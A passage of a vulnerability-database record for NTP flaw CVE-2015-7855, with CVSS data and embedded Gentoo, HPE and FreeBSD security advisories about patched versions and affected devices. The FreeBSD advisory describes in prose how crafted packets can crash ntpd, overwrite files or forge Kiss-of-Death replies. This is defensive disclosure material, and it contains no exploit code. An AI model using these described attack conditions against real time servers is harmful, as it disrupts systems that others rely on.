[ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:tim_4r-ie_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:tim_4r-ie:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:tim_4r-ie_dnp3_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:tim_4r-ie_dnp3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7855" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "John D \"Doug\" Birdwell of IDA.org.", "sources": [ { "db": "BID", "id": "77283" } ], "trust": 0.3 }, "cve": "CVE-2015-7855", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-7855", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 2.8, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 6.5, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-7855", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-7855", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201510-575", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-7855", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "CNNVD", "id": "CNNVD-201510-575" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value. NTP Is vulnerable to input validation.Denial of service (DoS) It may be put into a state. Network Time Protocol is prone to a denial-of-service vulnerability. \nA remote attacker may exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n\nRelease Date: 2016-09-21\nLast Updated: 2016-09-21\n\nPotential Security Impact: Multiple Remote Vulnerabilities\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities in NTP have been addressed with HPE\nComware 7 (CW7) network products. \n\nReferences:\n\n - CVE-2015-7704\n - CVE-2015-7705\n - CVE-2015-7855\n - CVE-2015-7871\n - PSRT110228\n - SSRT102943\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n - Comware 7 (CW7) Products - Please refer to the RESOLUTION\n below for a list of impacted products. All product versions are impacted\nprior to the fixed versions listed. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-7704\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n CVE-2015-7705\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n CVE-2015-7855\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n CVE-2015-7871\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\nHPE has released the following software updates to resolve the\nvulnerabilities in HPE Comware 7 network products. \n\n**COMWARE 7 Products**\n\n + **12500 (Comware 7) - Version: R7377**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n + **10500 (Comware 7) - Version: R7178**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n + **12900 (Comware 7) - Version: R1138P03**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n + **5900 (Comware 7) - Version: R2422P02**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n + **MSR1000 (Comware 7) - Version: R0305P08**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n + **MSR2000 (Comware 7) - Version: R0305P08**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n + **MSR3000 (Comware 7) - Version: R0305P08**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n + **MSR4000 (Comware 7) - Version: R0305P08**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n + **VSR (Comware 7) - Version: E0322**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n + **7900 (Comware 7) - Version: R2138P03**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n + **5130 (Comware 7) - Version: R3111P03**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n + **5700 (Comware 7) - Version: R2422P02**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n + **5930 (Comware 7) - Version: R2422P02**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n + **HSR6600 (Comware 7) - Version: R7103P07**\n * HP Network Products\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n + **HSR6800 (Comware 7) - Version: R7103P07**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n + **1950 (Comware 7) - Version: R3111P03**\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n + **7500 (Comware 7) - Version: R7178**\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n + **5130HI - Version: R1118P02**\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n + **5510HI - Version: R1118P02**\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 September 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-15:25.ntp Security Advisory\n The FreeBSD Project\n\nTopic: Multiple vulnerabilities of ntp\n\nCategory: contrib\nModule: ntp\nAnnounced: 2015-10-26\nCredits: Network Time Foundation\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE)\n 2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6)\n 2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23)\n 2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE)\n 2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29)\nCVE Name: CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\n CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851,\n CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855,\n CVE-2015-7871\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit https://security.FreeBSD.org/. \n\nI. \n\nII. Problem Description\n\nCrypto-NAK packets can be used to cause ntpd(8) to accept time from an\nunauthenticated ephemeral symmetric peer by bypassing the authentication\nrequired to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and\n10.1 are not affected. [CVE-2015-7855]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd(8) that\nmay cause it to crash, with the hypothetical possibility of a small code\ninjection. [CVE-2015-7854]\n\nA negative value for the datalen parameter will overflow a data buffer. \nNTF\u0027s ntpd(8) driver implementations always set this value to 0 and are\ntherefore not vulnerable to this weakness. If you are running a custom\nrefclock driver in ntpd(8) and that driver supplies a negative value for\ndatalen (no custom driver of even minimal competence would do this)\nthen ntpd would overflow a data buffer. It is even hypothetically\npossible in this case that instead of simply crashing ntpd the\nattacker could effect a code injection attack. [CVE-2015-7853]\n\nIf an attacker can figure out the precise moment that ntpq(8) is listening\nfor data and the port number it is listening on or if the attacker can\nprovide a malicious instance ntpd(8) that victims will connect to then an\nattacker can send a set of crafted mode 6 response packets that, if\nreceived by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) IP address is allowed to send remote configuration\nrequests, and if the attacker knows the remote configuration password\nor if ntpd(8) was configured to disable authentication, then an attacker\ncan send a set of packets to ntpd that may cause ntpd(8) to overwrite\nfiles. [CVE-2015-7851]. The default configuration of ntpd(8) within\nFreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd\nthat will cause it to crash and/or create a potentially huge log\nfile. Specifically, the attacker could enable extended logging,\npoint the key file at the log file, and cause what amounts to an\ninfinite loop. [CVE-2015-7850]. The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd was configured to disable\nauthentication, then an attacker can send a set of packets to\nntpd that may cause a crash or theoretically perform a code\ninjection attack. [CVE-2015-7849]. The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to enable mode 7 packets, and if the use\nof mode 7 packets is not properly protected thru the use of the\navailable mode 7 authentication and restriction mechanisms, and\nif the (possibly spoofed) source IP address is allowed to send\nmode 7 queries, then an attacker can send a crafted packet to\nntpd that will cause it to crash. [CVE-2015-7848]. The default\nconfiguration of ntpd(8) within FreeBSD does not allow mode 7\npackets. \n\nIf ntpd(8) is configured to use autokey, then an attacker can send\npackets to ntpd that will, after several days of ongoing attack,\ncause it to run out of memory. [CVE-2015-7701]. The default\nconfiguration of ntpd(8) within FreeBSD does not use autokey. \n\nIf ntpd(8) is configured to allow for remote configuration, and if\nthe (possibly spoofed) source IP address is allowed to send\nremote configuration requests, and if the attacker knows the\nremote configuration password, it\u0027s possible for an attacker\nto use the \"pidfile\" or \"driftfile\" directives to potentially\noverwrite other files. [CVE-2015-5196]. The default configuration\nof ntpd(8) within FreeBSD does not allow remote configuration\n\nAn ntpd(8) client that honors Kiss-of-Death responses will honor\nKoD messages that have been forged by an attacker, causing it\nto delay or stop querying its servers for time updates. Also,\nan attacker can forge packets that claim to be from the target\nand send them to servers often enough that a server that\nimplements KoD rate limiting will send the target machine a\nKoD response to attempt to reduce the rate of incoming packets,\nor it may also trigger a firewall block at the server for\npackets from the target machine. For either of these attacks\nto succeed, the attacker must know what servers the target\nis communicating with. An attacker can be anywhere on the\nInternet and can frequently learn the identity of the target\u0027s\ntime source by sending the target a time query. [CVE-2015-7704]\n\nThe fix for CVE-2014-9750 was incomplete in that there were\ncertain code paths where a packet with particular autokey\noperations that contained malicious data was not always being\ncompletely validated. Receipt of these packets can cause ntpd\nto crash. [CVE-2015-7702]. The default configuration of ntpd(8)\nwithin FreeBSD does not use autokey. \n\nIII. Impact\n\nAn attacker which can send NTP packets to ntpd(8), which uses cryptographic\nauthentication of NTP data, may be able to inject malicious time data\ncausing the system clock to be set incorrectly. [CVE-2015-7871]\n\nAn attacker which can send NTP packets to ntpd(8), can block the\ncommunication of the daemon with time servers, causing the system\nclock not being 